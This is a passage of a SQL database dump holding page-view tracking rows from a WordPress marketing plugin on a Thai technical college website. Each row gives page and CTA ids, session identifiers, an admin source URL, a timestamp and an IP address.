(139, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:18', '192.168.10.71'),
(140, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:18', '192.168.10.71'),
(141, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:18', '192.168.10.71'),
(142, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:18', '192.168.10.71'),
(143, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:18', '192.168.10.71'),
(144, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:46', '192.168.10.71'),
(145, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:46', '192.168.10.71'),
(146, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:46', '192.168.10.71'),
(147, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:46', '192.168.10.71'),
(148, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:02:46', '192.168.10.71'),
(149, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:34', '192.168.10.71'),
(150, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:34', '192.168.10.71'),
(151, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:34', '192.168.10.71'),
(152, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:34', '192.168.10.71'),
(153, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:34', '192.168.10.71'),
(154, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:35', '192.168.10.71'),
(155, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:35', '192.168.10.71'),
(156, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:35', '192.168.10.71'),
(157, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:35', '192.168.10.71'),
(158, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:03:35', '192.168.10.71'),
(159, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:04:41', '192.168.10.71'),
(160, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:04:41', '192.168.10.71'),
(161, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:04:41', '192.168.10.71'),
(162, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:04:41', '192.168.10.71'),
(163, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:04:41', '192.168.10.71'),
(164, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:05:10', '192.168.10.71'),
(165, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:05:10', '192.168.10.71'),
(166, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:05:10', '192.168.10.71'),
(167, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:05:10', '192.168.10.71'),
(168, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:05:10', '192.168.10.71'),
(169, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:06:35', '192.168.10.71'),
(170, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:06:35', '192.168.10.71'),
(171, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:06:35', '192.168.10.71'),
(172, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:06:35', '192.168.10.71'),
(173, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:06:35', '192.168.10.71'),
(174, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:27', '192.168.10.71'),
(175, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:27', '192.168.10.71'),
(176, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:27', '192.168.10.71'),
(177, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:27', '192.168.10.71'),
(178, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:27', '192.168.10.71'),
(179, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:28', '192.168.10.71'),
(180, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:28', '192.168.10.71'),
(181, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:28', '192.168.10.71'),
(182, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:28', '192.168.10.71'),
(183, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:07:28', '192.168.10.71'),
(184, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:08:17', '192.168.10.71'),
(185, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:08:17', '192.168.10.71'),
(186, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:08:17', '192.168.10.71'),
(187, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:08:17', '192.168.10.71'),
(188, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:08:17', '192.168.10.71'),
(189, '634', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(190, '634', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(191, '634', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(192, '634', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(193, '634', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(194, '634', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:12:26', '192.168.10.71'),
(195, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(196, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(197, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(198, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(199, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(200, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(201, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(202, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(203, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:15', '192.168.10.71'),
(204, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(205, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(206, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(207, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(208, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(209, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(210, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(211, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(212, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:16', '192.168.10.71'),
(213, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(214, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(215, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(216, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(217, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(218, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:17', '192.168.10.71'),
(219, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(220, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(221, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(222, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(223, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(224, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:15:33', '192.168.10.71'),
(225, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(226, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(227, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(228, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(229, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(230, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:18:48', '223.24.178.209'),
(231, '160', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209'),
(232, '160', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209'),
(233, '160', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209'),
(234, '160', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209'),
(235, '160', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209'),
(236, '160', '634', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:37', '223.24.178.209');
INSERT INTO `wp_inbound_page_views` (`id`, `page_id`, `cta_id`, `variation_id`, `lead_id`, `lead_uid`, `list_id`, `session_id`, `source`, `datetime`, `ip`) VALUES
(237, '287', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
(238, '287', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
(239, '287', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
(240, '287', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 16:20:42', '223.24.178.209'),
